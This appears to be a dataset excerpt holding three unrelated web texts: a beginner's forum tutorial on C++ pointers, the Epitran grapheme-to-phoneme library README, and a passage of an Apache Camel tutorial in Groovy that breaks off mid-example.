text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Abhinash 102 Report post Posted August 20, 2006 As I always do.. let me tell you guys that till now I am just a beginner of c++ programming and its been just about a week since I started programming in c++. I am a self learner so I kinda GOOGLE for ideas a lot. The better idea to using Global variable in a program is definitely pointers. Pointer is just an adress. You need to keep that in mind if you want to learn how to change the value of a variable using pointers. Ok guys bare with me as I make this analogy. Trust me THIS IS BOUND to clear the concept of pointers. Imagine there are three box A, B, C. the names (A,B and C) are written on the bottom face of the box (I mean to say that you cant just see the name of the box without taking it out and seeing the bottom when it is places somewhere!!). Now put the box A on the table , B under the table and C on the chair, with a red ball in box A. Now call someone who doesnt know which box is which and what each (or any) has. Now give him a cheat with the message "Whats in the box on the table?". He will go to the box on the table(which hapens to be A) and says it loud "a red ball". You should have got the idea yet. You didnt ask the person to go and search in the Box 'A' but since the location "on the table" had Box 'A' he checked THAT particular box. Here the cheat was the "Pointer". It didn't actually have the red ball but let you se what was in the box. No again in the same situation give a secong persont a cheat that reads"take out whatever is in the Box on the table and put a blu ball there" and a third person a cheat that reads" check whats in the box on the table" then the third person's reply will certainly be "a blue ball"... You get it?? Man you just changed the "value" of variable "Box A" without even mentioning its name!!!! Now THATS why I wrote this stupid STORY. You can use the same idea to change the varibles from different functions, and let me tell you this... the process that we use in the program iis not a bit close to the story.. its Wayyyyyyyyyyyyyyyyyyyyyyyyyyyyy shorter... hehe. ok, NOW I TEACH YOU the real stuff. First of all how do we get the adress of the variable?? ok the answer is simple(should be.. now that you understand the concept.. I suppose!!!) an "&" ampersand symbol in front of any variable returns the adress of the variable.... period. (well incase you want to know in which format... its the hexadecimal format.... wo wo wo.. now don't expect me to explain the hexa format.. guys this is a tutorial for pointers remember?? if you want to ask about hexa write to me and I will explain. and if you are a die hard KNOWER.. just like me.. wel why dont you do this .. try cout << &variablemane; it will print the adress of the variable once you execute it.) ok back to the point os the adress of variable var is &var (and period) now you cant just use any variable for the pointer you need pointer variable pointer variable is declared using * infront of the variable name while declaring the type for example: an integer pointer would be: int *IMadeAPointer a string pointer would be??? YES!! you got it .. its => string *ThisIsFun now why did I declare integer and string pointers differently?? well here is the detail whic I THINK IS TRUE .. Seriously I HAVENT FOUND THE REASON IN ANY BOOK WHATSOEVER BUT THIS IS WHAT I THINK: Later we change the value of the actual variable using the pointer so to do that we should be able to use an appropriate type(int string or blah blah blah). So maybe for the FUTURE USE we declare the type straight away) Ok guys so if you do this you store the adress of name in ptr name (these are any variables that I built dont have to be specific but beter use the way I did that is put aptr before the variable to declare the pointer will be easier for you DAWG. aah just a bit Hip Hopping!!!) string name; string *ptrname; ptrname = &name *ptrname = "Baam" cout << name; ok guess what you see in the output?? YEP THE ANSWER IS "Baam" (sory if you guessed "Whatever is in the name variable") so this is how you change the value of the actual variable using pointer variable. remember here in this program if you add a few things like this: string name = "Boom"; string *ptrname; ptrname = &name //suppose the address of name is 0x12ac cout << ptrname << "\n"; *ptrname = "Baam" cout << ptrname << "\n"; cout << name; you willl see the output 0x12ac 0x12ac Baam this shows that the value of the pointer has not changed only the value of the variable the pointer points to has changed. now comes the fun part: using the Functions!! (OH HOW I LOVE FUNCTIONS!!!) I won't explain this though... you should understand it!!!!(Don't disappoin me MY PUPIL!!;)) #include<iostream> #include<stdlib.h> #include<string> using namespace std; void pointer(string *ptr){ /*I have made a few changes now thanks to the guys whose comments are below mine make sure you check the value of the pointer for it might be null and if it is null it may crash the program. So I made a condition that would only use the pointer if the pointer value is not null */ if(ptr){ *ptr = "Changed!!"; } else{ /*include the action that you want to undertake if the pointer leads to nothing!! */ } } int main() { string word = "unchanged"; pointer(&word); cout << word; return 0; } and YESS!!!! You ARE done, no problem if you have the function in separate source file but remember to put a function prototype in the main file... good luck!! [Edited by - Abhinash on August 20, 2006 2:45:52 PM] 0 Share this post Link to post Share on other sites
https://www.gamedev.net/forums/topic/410488-change-the-variables-of-one-function-from-the-other-using-pointers-in-c/
CC-MAIN-2017-34
refinedweb
1,051
79.7
Tools for transcribing languages into IPA. Project description Epitran A library and tool for transliterating orthographic text as IPA (International Phonetic Alphabet). Usage The Python modules epitran and epitran.vector can be used to easily write more sophisticated Python programs for deploying the Epitran mapping tables, preprocessors, and postprocessors. This is documented below. Using the epitran Module The Epitran class The most general functionality in the epitran module is encapsulated in the very simple Epitran class: Epitran(code, preproc=True, postproc=True, ligatures=False, cedict_file=None). Its constructor takes one argument, code, the ISO 639-3 code of the language to be transliterated plus a hyphen plus a four letter code for the script (e.g. 'Latn' for Latin script, 'Cyrl' for Cyrillic script, and 'Arab' for a Perso-Arabic script). It also takes optional keyword arguments: preprocand postprocenable pre- and post-processors. These are enabled by default. ligaturesenables non-standard IPA ligatures like "ʤ" and "ʨ". cedict_filegives the path to the CC-CEDict dictionary file (relevant only when working with Mandarin Chinese and which, because of licensing restrictions cannot be distributed with Epitran). >>> import epitran >>> epi = epitran.Epitran('uig-Arab') # Uyghur in Perso-Arabic script It is now possible to use the Epitran class for English and Mandarin Chinese (Simplified and Traditional) G2P as well as the other langugages that use Epitran's "classic" model. For Chinese, it is necessary to point the constructor to a copy of the CC-CEDict dictionary: >>> import epitran >>> epi = epitran.Epitran('cmn-Hans', cedict_file='cedict_1_0_ts_utf-8_mdbg.txt') The most useful public method of the Epitran class is transliterate: Epitran.transliterate(text, normpunc=False, ligatures=False). Convert text (in Unicode-encoded orthography of the language specified in the constructor) to IPA, which is returned. normpunc enables punctuation normalization and ligatures enables non-standard IPA ligatures like "ʤ" and "ʨ". Usage is illustrated below (Python 2): >>> epi.transliterate(u'Düğün') u'dy\u0270yn' >>> print(epi.transliterate(u'Düğün')) dyɰyn Epitran.word_to_tuples(word, normpunc=False): Takes a word (a Unicode string) in a supported orthography as input and returns a list of tuples with each tuple corresponding to an IPA segment of the word. The tuples have the following structure: ( character_category :: String, is_upper :: Integer, orthographic_form :: Unicode String, phonetic_form :: Unicode String, segments :: List<Tuples> ) Note that word_to_tuples is not implemented for all language-script pairs. The codes for character_category are from the initial characters of the two character sequences listed in the "General Category" codes found in Chapter 4 of the Unicode Standard. For example, "L" corresponds to letters and "P" corresponds to production marks. The above data structure is likely to change in subsequent versions of the library. The structure of segments is as follows: ( segment :: Unicode String, vector :: List<Integer> ) Here is an example of an interaction with word_to_tuples (Python 2): >>> import epitran >>> epi = epitran.Epitran('tur-Latn') >>> epi.word_to_tuples(u'Düğün') [(u'L', 1, u'D', u'd', [(u'd', [-1, -1, 1, -1, -1, -1, -1, -1, 1, -1, -1, 1, 1, -1, -1, -1, -1, -1, -1, 0, -1])]), (u'L', 0, u'u\u0308', u'y', [(u'y', [1, 1, -1, 1, -1, -1, -1, 0, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, 1, -1])]), (u'L', 0, u'g\u0306', u'\u0270', [(u'\u0270', [-1, 1, -1, 1, 0, -1, -1, 0, 1, -1, -1, 0, -1, 0, -1, 1, -1, 0, -1, 1, -1])]), (u'L', 0, u'u\u0308', u'y', [(u'y', [1, 1, -1, 1, -1, -1, -1, 0, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, 1, -1])]), (u'L', 0, u'n', u'n', [(u'n', [-1, 1, 1, -1, -1, -1, 1, -1, 1, -1, -1, 1, 1, -1, -1, -1, -1, -1, -1, 0, -1])])] The Backoff class Sometimes, when parsing text in more than one script, it is useful to employ a graceful backoff. If one language mode does not work, it can be useful to fall back to another, and so on. This functionality is provided by the Backoff class: Backoff(lang_script_codes, cedict_file=None) Note that the Backoff class does not currently support parameterized preprocessor and postprocessor application and does not support non-standard ligatures. It also does not support punctuation normalization. lang_script_codes is a list of codes like eng-Latn or hin-Deva. For example, if one was transcribing a Hindi text with many English loanwords and some stray characters of Simplified Chinese, one might use the following code (Python 3): from epitran.backoff import Backoff >>> backoff = Backoff(['hin-Deva', 'eng-Latn', 'cmn-Hans'], cedict_file=‘cedict_1_0_ts_utf-8_mdbg.txt') >>> backoff.transliterate('हिन्दी') 'ɦindiː' >>> backoff.transliterate('English') 'ɪŋɡlɪʃ' >>> backoff.transliterate('中文') 'ʈ͡ʂoŋwən' Backoff works on a token-by-token basis: tokens that contain mixed scripts will be returned as the empty string, since they cannot be fully converted by any of the modes. The Backoff class has the following public methods: - transliterate: returns a unicode string of IPA phonemes - trans_list: returns a list of IPA unicode strings, each of which is a phoneme - xsampa_list: returns a list of X-SAMPA (ASCII) strings, each of which is phoneme Consider the following example (Python 3): >>> backoff.transliterate('हिन्दी') 'ɦindiː' >>> backoff.trans_list('हिन्दी') ['ɦ', 'i', 'n', 'd', 'iː'] >>> backoff.xsampa_list('हिन्दी') ['h\\', 'i', 'n', 'd', 'i:'] DictFirst The DictFirst class provides a simple alternative to the Backoff class. It requires a dictionary of words known to be of Language A, one word per line in a UTF-8 encoded text file. It accepts three arguments: the language-script code for Language A, that for Language B, and a path to the dictionary file. It has one public method, transliteration, which works like Epitran.transliterate except that it returns the transliteration for Language A if the input token is in the dictionary; otherwise, it returns the Language B transliteration of the token: >>> import dictfirst >>> df = dictfirst.DictFirst('tpi-Latn', 'eng-Latn', '../sample-dict.txt') >>> df.transliterate('pela') 'pela' >>> df.transliterate('pelo') 'pɛlow' Preprocessors, postprocessors, and their pitfalls In order to build a maintainable orthography to phoneme mapper, it is sometimes necessary to employ preprocessors that make contextual substitutions of symbols before text is passed to a orthography-to-IPA mapping system that preserves relationships between input and output characters. This is particularly true of languages with a poor sound-symbols correspondence (like French and English). Languages like French are particularly good targets for this approach because the pronunciation of a given string of letters is highly predictable even though the individual symbols often do not map neatly into sounds. (Sound-symbol correspondence is so poor in English that effective English G2P systems rely heavily on pronouncing dictionaries.) Preprocessing the inputs words to allow for straightforward grapheme-to-phoneme mappings (as is done in the current version of epitran for some languages) is advantageous because the restricted regular expression language used to write the preprocessing rules is more powerful than the language for the mapping rules and allows the equivalent of many mapping rules to be written with a single rule. Without them, providing epitran support for languages like French and German would not be practical. However, they do present some problems. Specifically, when using a language with a preprocessor, one must be aware that the input word will not always be identical to the concatenation of the orthographic strings ( orthographic_form) output by Epitran.word_to_tuples. Instead, the output of word_to_tuple will reflect the output of the preprocessor, which may delete, insert, and change letters in order to allow direct orthography-to-phoneme mapping at the next step. The same is true of other methods that rely on Epitran.word_to_tuple such as VectorsWithIPASpace.word_to_segs from the epitran.vector module. For information on writing new pre- and post-processors, see the section on "Extending Epitran with map files, preprocessors and postprocessors", below. Using the epitran.vector Module The epitran.vector module is also very simple. It contains one class, VectorsWithIPASpace, including one method of interest, word_to_segs: The constructor for VectorsWithIPASpace takes two arguments: code: the language-script code for the language to be processed. spaces: the codes for the punctuation/symbol/IPA space in which the characters/segments from the data are expected to reside. The available spaces are listed below. Its principle method is word_to_segs: VectorWithIPASpace.word_to_segs(word, normpunc=False). word is a Unicode string. If the keyword argument normpunc is set to True, punctuation discovered in word is normalized to ASCII equivalents. A typical interaction with the VectorsWithIPASpace object via the word_to_segs method is illustrated here (Python 2): >>> import epitran.vector >>> vwis = epitran.vector.VectorsWithIPASpace('uzb-Latn', ['uzb-Latn']) >>> vwis.word_to_segs(u'darë') [(u'L', 0, u'd', u'd\u032a', u'40', [-1, -1, 1, -1, -1, -1, -1, -1, 1, -1, -1, 1, 1, 1, -1, -1, -1, -1, -1, 0, -1]), (u'L', 0, u'a', u'a', u'37', [1, 1, -1, 1, -1, -1, -1, 0, 1, -1, -1, -1, -1, -1, -1, -1, 1, 1, -1, 1, -1]), (u'L', 0, u'r', u'r', u'54', [-1, 1, 1, 1, 0, -1, -1, -1, 1, -1, -1, 1, 1, -1, -1, 0, 0, 0, -1, 0, -1]), (u'L', 0, u'e\u0308', u'ja', u'46', [-1, 1, -1, 1, -1, -1, -1, 0, 1, -1, -1, -1, -1, 0, -1, 1, -1, -1, -1, 0, -1]), (u'L', 0, u'e\u0308', u'ja', u'37', [1, 1, -1, 1, -1, -1, -1, 0, 1, -1, -1, -1, -1, -1, -1, -1, 1, 1, -1, 1, -1])] (It is important to note that, though the word that serves as input--darë--has four letters, the output contains four tuples because the last letter in darë actually corresponds to two IPA segments, /j/ and /a/.) The returned data structure is a list of tuples, each with the following structure: ( character_category :: String, is_upper :: Integer, orthographic_form :: Unicode String, phonetic_form :: Unicode String, in_ipa_punc_space :: Integer, phonological_feature_vector :: List<Integer> ) A few notes are in order regarding this data structure: character_categoryis defined as part of the Unicode standard (Chapter 4). It consists of a single, uppercase letter from the set {'L', 'M', 'N', 'P', 'S', 'Z', 'C'}.. The most frequent of these are 'L' (letter), 'N' (number), 'P' (punctuation), and 'Z' (separator [including separating white space]). is_upperconsists only of integers from the set {0, 1}, with 0 indicating lowercase and 1 indicating uppercase. - The integer in in_ipa_punc_spaceis an index to a list of known characters/segments such that, barring degenerate cases, each character or segment is assignmed a unique and globally consistant number. In cases where a character is encountered which is not in the known space, this field has the value -1. - The length of the list phonological_feature_vectorshould be constant for any instantiation of the class (it is based on the number of features defined in panphon) but is--in principles--variable. The integers in this list are drawn from the set {-1, 0, 1}, with -1 corresponding to '-', 0 corresponding to '0', and 1 corresponding to '+'. For characters with no IPA equivalent, all values in the list are 0. Language Support Transliteration Language/Script Pairs *Chinese G2P requires the freely available CC-CEDict dictionary. †These language preprocessors and maps naively assume a phonemic orthography. ‡English G2P requires the installation of the freely available CMU Flite speech synthesis system. Languages with limited support due to highly ambiguous orthographies Some the languages listed above should be approached with caution. It is not possible to provide highly accurate support for these language-script pairs due to the high degree of ambiguity inherent in the orthographies. Eventually, we plan to support these languages with a different back end based on WFSTs or neural methods. Language "Spaces" Note that major languages, including French, are missing from this table due to a lack of appropriate text data. Installation of Flite (for English G2P) For use with most languages, Epitran requires no special installation steps. It can be installed as an ordinarary python package, either with pip or by running python setup.py install in the root of the source directory. However, English G2P in Epitran relies on CMU Flite, a speech synthesis package by Alan Black and other speech researchers at Carnegie Mellon University. For the current version of Epitran, you should follow the installation instructions for lex_lookup, which is used as the default G2P interface for Epitran. t2p Not recommended The epitran.flite module shells out to the flite speech synthesis system to do English G2P. Flite must be installed in order for this module to function. The t2p binary from flite is not installed by default and must be manually copied into the path. An illustration of how this can be done on a Unix-like system is given below. Note that GNU gmake is required and that, if you have another make installed, you may have to call gmake explicitly: $ tar xjf flite-2.0.0-release.tar.bz2 $ cd flite-2.0.0-release/ $ ./configure && make $ sudo make install $ sudo cp bin/t2p /usr/local/bin You should adapt these instructions to local conditions. Installation on Windows is easiest when using Cygwin. You will have to use your discretion in deciding where to put t2p.exe on Windows, since this may depend on your python setup. Other platforms are likely workable but have not been tested. lex_lookup Recommended t2p does not behave as expected on letter sequences that are highly infrequent in English. In such cases, t2p gives the pronunciation of the English letters of the name, rather than an attempt at the pronunciation of the name. There is a different binary included in the most recent (pre-release) versions of Flite that behaves better in this regard, but takes some extra effort to install. To install, you need to obtain at least version 2.0.5 of Flite. We recommend that you obtain the source from GitHub (). Untar and compile the source, following the steps below, adjusting where appropriate for your system: $ tar xjf flite-2.0.5-current.tar.bz2 $ cd flite-2.0.5-current or $ git clone git@github.com:festvox/flite.git $ cd flite/ then $ ./configure && make $ sudo make install $ cd testsuite $ make lex_lookup $ sudo cp lex_lookup /usr/local/bin When installing on MacOS and other systems that use a BSD version of cp, some modification to a Makefile must be made in order to install flite-2.0.5 (between steps 3 and 4). Edit main/Makefile and change both instances of cp -pd to cp -pR. Then resume the steps above at step 4. Usage To use lex_lookup, simply instantiate Epitran as usual, but with the code set to 'eng-Latn': >>> import epitran >>> epi = epitran.Epitran('eng-Latn') >>> print epi.transliterate(u'Berkeley') bɹ̩kli Extending Epitran with map files, preprocessors and postprocessors Language support in Epitran is provided through map files, which define mappings between orthographic and phonetic units, preprocessors that run before the map is applied, and postprocessors that run after the map is applied. Maps are defined in UTF8-encoded, comma-delimited value (CSV) files. The files are each named <iso639>-<iso15924>.csv where <iso639> is the (three letter, all lowercase) ISO 639-3 code for the language and <iso15924> is the (four letter, capitalized) ISO 15924 code for the script. These files reside in the data directory of the Epitran installation under the map, pre, and post subdirectories, respectively. The pre- and post-processor files are text files whose format is described belown. They follow the same naming conventions except that they have the file extensions .txt. Map files (mapping tables) The map files are simple, two-column files where the first column contains the orthgraphic characters/sequences and the second column contains the phonetic characters/sequences. The two columns are separated by a comma; each row is terminated by a newline. For many languages (most languages with unambiguous, phonemically adequate orthographies) just this easy-to-produce mapping file is adequate to produce a serviceable G2P system. The first row is a header and is discarded. For consistency, it should contain the fields "Orth" and "Phon". The following rows by consist of fields of any length, separated by a comma. The same phonetic form (the second field) may occur any number of times but an orthographic form may only occur once. Where one orthograrphic form is a prefix of another form, the longer form has priority in mapping. In other words, matching between orthographic units and orthographic strings is greedy. Mapping works by finding the longest prefix of the orthographic form and adding the corresponding phonetic string to the end of the phonetic form, then removing the prefix from the orthographic form and continuing, in the same manner, until the orthographic form is consumed. If no non-empty prefix of the orthographic form is present in the mapping table, the first character in the orthographic form is removed and appended to the phonetic form. The normal sequence then resumes. This means that non-phonetic characters may end up in the "phonetic" form, which we judge to be better than losing information through an inadequate mapping table. Preprocesssors and postprocessors For language-script pairs with more complicated orthographies, it is sometimes necessary to manipulate the orthographic form prior to mapping or to manipulate the phonetic form after mapping. This is done, in Epitran, with grammars of context-sensitive string rewrite rules. In truth, these rules would be more than adequate to solve the mapping problem as well but in practical terms, it is usually easier to let easy-to-understand and easy-to-maintain mapping files carry most of the weight of conversion and reserve the more powerful context sensitive grammar formalism for pre- and post-processing. The preprocessor and postprocessor files have the same format. They consist of a sequence of lines, each consisting of one of four types: - Symbol definitions - Context-sensitive rewrite rules - Blank lines Symbol definitions Lines like the following ::vowels:: = a|e|i|o|u define symbols that can be reused in writing rules. Symbols must consist of a prefix of two colons, a sequence of one or more lowercase letters and underscores, and a suffix of two colons. The are separated from their definitions by the equals sign (optionally set off with white space). The definition consists of a substring from a regular expression. Symbols must be defined before they are referenced. Rewrite rules Context-sensitive rewrite rules in Epitran are written in a format familiar to phonologists but transparent to computer scientists. They can be schematized as a -> b / X _ Y which can be rewitten as XaY → XbY The arrow -> can be read as "is rewritten as" and the slash / can be read as "in the context". The underscore indicates the position of the symbol(s) being rewritten. Another special symbol is the octothorp #, which indicates the beginning or end of a (word length) string (a word boundary). Consider the following rule: e -> ə / _ # This rule can be read as "/e/ is rewritten as /ə/ in the context at the end of the word." A final special symbol is zero 0, which represents the empty string. It is used in rules that insert or delete segments. Consider the following rule that deletes /ə/ between /k/ and /l/: ə -> 0 / k _ l All rules must include the arrow operator, the slash operator, and the underscore. A rule that applies in a context-free fashion can be written in the following way: ch -> x / _ The implementation of context-sensitive rules in Epitran pre- and post-processors uses regular expression replacement. Specifically, it employs the regex package, a drop-in replacement for re. Because of this, regular expression notation can be used in writing rules: c -> s / _ [ie] or c -> s / _ (i|e) For a complete guide to regex regular expressions, see the documentation for re and for regex, specifically. Fragments of regular expressions can be assigned to symbols and reused throughout a file. For example, symbol for the disjunction of vowels in a language can be used in a rule that changes /u/ into /w/ before vowels: ::vowels:: = a|e|i|o|u ... u -> w / _ (::vowels::) There is a special construct for handling cases of metathesis (where "AB" is replaced with "BA"). For example, the rule: (?P<sw1>[เแโไใไ])(?P<sw2>.) -> 0 / _ Will "swap" the positions of any character in "เแโไใไ" and any following character. Left of the arrow, there should be two groups (surrounded by parentheses) with the names sw1 and sw2 (a name for a group is specified by ?P<name> appearing immediately after the open parenthesis for a group). The substrings matched by the two groups, sw1 and sw2 will be "swapped" or metathesized. The item immediately right of the arrow is ignored, but the context is not. The rules apply in order, so earlier rules may "feed" and "bleed" later rules. Therefore, their sequence is very important and can be leveraged in order to achieve valuable results. Comments and blank lines (lines consisting only of white space) are allowed to make your code more readable. Any line in which the first non-whitespace character is a percent sign % is interpreted as comment. The rest of the line is ignored when the file is interpreted. Blank lines are also ignored. A strategy for adding language support Epitran uses a mapping-and-repairs approach to G2P. It is expected that there is a mapping between graphemes and phonemes that can do most of the work of converting orthographic representations to phonological representations. In phonemically adequate orthogrphies, this mapping can do all of the work. This mapping should be completed first. For many languages, a basis for this mapping table already exists on Wikipedia and Omniglot (though the Omniglot tables are typically not machine readable). On the other hand, many writing systems deviate from the phonemically adequate idea. It is here that pre- and post-processors must be introduced. For example, in Swedish, the letter <a> receives a different pronunciation before two consonants (/ɐ/) than elsewhere (/ɑː/). It makes sense to add a preprocessor rule that rewrites <a> as /ɐ/ before two consonants (and similar rules for the other vowels, since they are affected by the same condition). Preprocessor rules should generally be employed whenever the orthographic representation must be adjusted (by contextual changes, deletions, etc.) prior to the mapping step. One common use for postprocessors is to eliminate characters that are needed by the preprocessors or maps, but which should not appear in the output. A classic example of this is the virama used in Indic scripts. In these scripts, in order to write a consonant not followed by a vowel, one uses the form of the consonant symbol with particular inherent vowel followed by a virama (which has various names in different Indic languages). An easy way of handling this is to allow the mapping to translate the consonant into an IPA consonant + an inherent vowel (which, for a given language, will always be the same), then use the postprocessor to delete the vowel + virama sequence (wherever it occurs). In fact, any situation where a character that is introduced by the map needs to be subsequently deleted is a good use-case for postprocessors. Another example from Indian languages includes so-called schwa deletion. Some vowels implied by a direct mapping between the orthography and the phonology are not actually pronounced; these vowels can generally be predicted. In most languages, they occur in the context after a vowel+consonant sequence and before a consonant+vowel sequence. In other words, the rule looks like the following: ə -> 0 / (::vowel::)(::consonant::) _ (::consonant::)(::vowel::) Perhaps the best way to learn how to structure language support for a new language is to consult the existing languages in Epitran. The French preprocessor fra-Latn.txt and the Thai postprocessor tha-Thai.txt illustrate many of the use-cases for these rules. Citing Epitran If you use Epitran in published work, or in other research, please use the following citation: David R. Mortensen, Siddharth Dalmia, and Patrick Littell. 2018. Epitran: Precision G2P for many languages. In Proceedings of the Eleventh International Conference on Language Resources and Evaluation (LREC 2018), Paris, France. European Language Resources Association (ELRA). @InProceedings{Mortensen-et-al:2018, author = {Mortensen, David R. and Dalmia, Siddharth and Littell, Patrick}, title = {Epitran: Precision {G2P} for Many Languages}, booktitle = {Proceedings of the Eleventh International Conference on Language Resources and Evaluation (LREC 2018)}, year = {2018}, month = {May}, date = {7--12}, location = {Miyazaki, Japan}, editor = {Nicoletta Calzolari (Conference chair) and Khalid Choukri and Christopher Cieri and Thierry Declerck and Sara Goggi and Koiti Hasida and Hitoshi Isahara and Bente Maegaard and Joseph Mariani and H\'el\`ene} } Project details Release history Release notifications Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/epitran/
CC-MAIN-2019-47
refinedweb
4,155
52.7
The Samba-Bugzilla – Bug 5285 missing capget/capset detection leading to compile errors with libcap-2.x Last modified: 2008-06-11 15:57:21 UTC The recent libcap-2.x versions actually define capget and capset without having to undefine _POSIX_SOURCE. This leads to compile errors due to different signatures (static vs non-static defined capget/capset). Therefore, configure should properly detect this. Created attachment 3153 [details] 3.0.28-libcap_detection.patch This patch adds the necessary check and the #ifdef ... #endif stuff. samba-3.2_pre2 is also affected and doesn't build without the patch. Applied your patch -- now it does not compile on my OpenSUSE 10.2 anymore. Volker hmm, strange. What's the error? Created attachment 3268 [details] Different approach for fixing compilation problems This patch: - removes explicit declarations of capget/capset from oplock_linux.c - removes struct definitions, relying on the definitions in linux/capabilities.h (also static is added, as they are not used outside oplock_linux.c) Samba will compile fine both under libcap-1.x and libcap-2.x w/o any warnings. Sure it will compile fine since linux/capabilities.h is provided by the kernel and not libcap. If they once differ you've got a problem and this is (from my understanding) not what's wanted. (In reply to comment #3) > Applied your patch -- now it does not compile on my OpenSUSE 10.2 anymore. > Volker On FC9 with patch compiled successfully We should move away from capget/capset and use the portable equivalents. Created attachment 3314 [details] move to portable capability functions (3-0-test) Created attachment 3315 [details] move to portable capability functions (3-2-test/3-3-test) Ok, I checked in these patches for 3-0-test, 3-2-test and 3-3-test. Build should be fine everywhere now. Thanks for the report! *** Bug 5537 has been marked as a duplicate of this bug. ***
https://bugzilla.samba.org/show_bug.cgi?id=5285
CC-MAIN-2017-43
refinedweb
318
52.56
Apache Camel is a routing and mediation engine which implements the Enterprise Integration Patterns. But don't let the words Enterprise Integration scare you off. Camel is designed to be really light weight and has a small footprint. It can be reused anywhere, whether in a servlet, in a Web services stack, inside a full ESB or a standalone messaging application. Camel makes it really simple to implement messaging application. So there are not many reasons why you could not use it in non-enterprise application. In fact, it is possible to use Camel as a tool, similar to the way you use scripting languages. For example, you could fire up the Camel Web Console and define a messaging application without write a single line of code. This article is a getting-started type of tutorial. As you might have guessed, I'm going to use Groovy as the programming language. And the programs in this article are intend to be ran with Groovysh, the Groovy Shell. Reasons: - Groovy is concise, expressive and has less noice than Java. All programs in this article are just a couple dozen lines long and should be real easy to follow along. - Using Groovysh allows the reader to interact with the application. I'm a Linux guy and am comfortable with VIM and working in command line. So bare with me. Putting the pieces together First, I'm going to write a simple program to make sure I'm able to talk to Camel in Groovy. I'm not using an IDE like Eclipse, nor creating a project, nor going to use any build tools like Maven. Any text editor will be sufficient. Save the following code to a file named CamelDemo.groovy (source download). import groovy.grape.Grape Grape.grab(group:"org.apache.camel", module:"camel-core", version:"2.0.0") class MyRouteBuilder extends org.apache.camel.builder.RouteBuilder { void configure() { from("direct://foo").to("mock://result") } } mrb = new MyRouteBuilder() ctx = new org.apache.camel.impl.DefaultCamelContext() ctx.addRoutes mrb ctx.start() p = ctx.createProducerTemplate() p.sendBody "direct:foo", "Camel Ride for beginner" e = ctx.getEndpoint("mock://result") ex = e.exchanges.first() println "INFO> ${ex}" This little program does a couple things: - Imports the camel-core jar using Grape.grab() - Defines a our custom RouteBuilder, which defines a simple route between a direct:foo and a mock:result enpoints. - Instantiates the CamelContext, adds our custom RouteBuilder to it and starts Camel by ctx.start(). - Tests the route by sending a message exchange using the producerTemplate obtained from the CamelContext - Lookups the mock:result endpoint (ctx.getEndpoint("mock:result")) and dislays the first Exchange, which should contain the message we just sent. Now start the groovysh in a command window and load the program: $ groovysh groovy:000> load CamelDemo.groovy you should see a bunch of output and then the output from the script: INFO> Exchange[Message: Camel Ride for beginner] ===> null groovy:000> At this point, you can interact with the program via groovysh. For example the following shows a few things you can do. groovy:000> ctx.routes ===> [EventDrivenConsumerRoute[Endpoint[seda://foo] -> UnitOfWork(Channel[sendTo(Endpoint[mock://result])])]] groovy:000> ctx.components ===> {mock=org.apache.camel.component.mock.MockComponent@14f2bd7, seda=org.apache.camel.component.seda.SedaComponent@c759f5} groovy:000> ctx.endpoints ===> [Endpoint[seda://foo], Endpoint[mock://result]] groovy:000> ctx.endpoints[1].exchanges ===> [Exchange[Message: Camel Ride for beginner]] groovy:000> ctx.endpoints[1].exchanges[0].in.body ===> Camel Ride for beginner groovy:000> p.sendBody("seda:foo", "Camel Kicking") ===> null groovy:000> e.exchanges ===> [Exchange[Message: Camel Ride for beginner], Exchange[Message: Camel Kicking]] This is it for our first Groovy/Camel program. For the curious, you can actually modify the program and reload it without terminating and restarting groovysh. Camel Stock Quote This is a simple stock quote application. Initially, I planed to walk you thru the development steps, from adding a simple bean as a Processor to transforming it to a Multi-Channel, Multi-Data-Format service application. But after I've finished developing the program, it turns out that it is too simple to justify for such elaboration. To save your time and mine, I'm just going to show you the final version right here. Take a look at it, and if you can understand what it does, then may be you should skip the rest of this article :) Save the following code to a file named StockQuote.groovy (source download). import groovy.grape.Grape Grape.grab(group:"org.apache.camel", module:"camel-core", version:"2.0.0") Grape.grab(group:"org.apache.camel", module:"camel-jetty", version:"2.0.0") Grape.grab(group:"org.apache.camel", module:"camel-freemarker", version:"2.0.0") class QuoteServiceBean { public String usStock(String symbol) { "${symbol}: 123.50 US\$" } public String hkStock(String symbol) { "${symbol}: 90.55 HK\$" } } class MyRouteBuilder extends org.apache.camel.builder.RouteBuilder { void configure() { from("direct://quote").choice() .when(body().contains(".HK")).bean(QuoteServiceBean.class, "hkStock") .otherwise().bean(QuoteServiceBean.class, "usStock") .end().to("mock://result") from("direct://xmlquote").transform().xpath("//quote/@symbol", String.class).to("direct://quote") //curl -H "Content-Type: text/xml" from('jetty:').transform() .simple('<quote symbol="${header.symbol}"></quote>').to("direct://xmlquote").choice() .when(header("Content-Type").isEqualTo("text/xml")).to("freemarker:xmlquote.ftl") .otherwise().to("freemarker:htmlquote.ftl") .end() } } ctx = new org.apache.camel.impl.DefaultCamelContext() mrb = new MyRouteBuilder() ctx.addRoutes mrb ctx.start() p = ctx.createProducerTemplate() //p.sendBody("direct:quote", "00005.HK") //p.sendBody("direct:xmlquote", "<quote symbol='IBM'/>") //p.sendBody("direct:xmlquote", "<quote symbol='00005.HK'/>") e = ctx.getEndpoint("mock://result") //e.exchanges.each { ex -> // println "INFO> in.body='${ex.in.body}'" //} OK, you are still here. It is assumed that: - We have two market data providers, one for U.S. market and the other for Hong Kong market. - An existing QuoteServiceBean class has been implemented as a POJO. It has two methods, usStock() and hkStock(). It is part of a legacy system, it works great, it hides the underlying details of interacting with the data providers. No one understands it and no one dares to modify it. - We would like to use the existing QuoteServiceBean to provide a stock quote service that can be consume easily. i.e. Multi-Channel and Multi-Data-Format. Content Based Router and Message Translator from("direct://quote").choice() .when(body().contains(".HK")).bean(QuoteServiceBean.class, "hkStock") .otherwise().bean(QuoteServiceBean.class, "usStock") .end().to("mock://result") The first route (start at line 17) represented by the direct:quote endpoint. It routes the message according to the content of the body of the exchange, which it's assumed to contain the stock symbol. When the body of the exchange contains the string ".HK" the hkStock(String symbol) of QuoteServiceBean is called, otherwise the usStock(String symbol) of QuoteServiceBean is called. Notice that the route DSL almost reads like plain English! Let us try it out. First start groovysh, load the program and send two messages to the direct:quote endpoint: jack@localhost tmp]$ groovysh Groovy Shell (1.6.6, JVM: 1.6.0_11) groovy:000> load StockQuote.groovy .............. groovy:000> 